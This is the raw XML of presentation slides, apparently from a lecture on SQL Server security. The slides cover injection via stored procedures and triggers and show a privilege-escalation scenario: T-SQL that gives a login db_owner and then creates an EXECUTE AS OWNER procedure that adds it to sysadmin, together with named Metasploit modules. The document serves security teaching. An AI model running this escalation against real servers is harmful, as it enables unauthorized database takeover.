            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Procedure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Trigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Creation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Contd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0E97815-6D5A-1946-B8E2-BAA7F3B5679E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Let’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>scenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>showcasing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> tester / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>red</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>member</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>leverage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>insufficiently</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> EXECUTE AS OWNER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</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dirty="0" err="1"/>
              <a:t>Both</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>reconnaissance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>phases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>automated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>external</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>perspectives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>auxiliary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>mssql_escalate_dbowner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>auxiliary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>mssql_escalate_dbowner_sqli</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21FF713F-ACFB-5A44-A097-552470A81FDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2177375"/>
            <a:ext cx="11041227" cy="122116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467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>CREATE LOGIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>AWLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> WITH PASSWORD = “P@ssw0rd“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:endParaRPr lang="cs-CZ" sz="1467" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ALTER LOGIN [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AWLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] WITH DEFAUL_DATABASE = [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AdventureWorks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CREATE USER [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AWUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] FROM LOGIN [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AWLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sp_addrolemember</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db_owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>], [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AWUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{301B5920-CF1F-EB4E-BEF4-397470283319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3611564"/>
            <a:ext cx="11041227" cy="99540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467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>CREATE PROCEDURE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>sp_elevate_me</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1467" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WITH EXECUTE AS OWNER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sp_addsrvrolemember</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AWLogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“,“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1467" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238833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1166-51F8-A94E-8256-2D821308564F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Escalating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBE58D97-9050-A740-B8B8-5E23C410E73D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>move</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>operating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>layer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>actually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>want</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to run as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
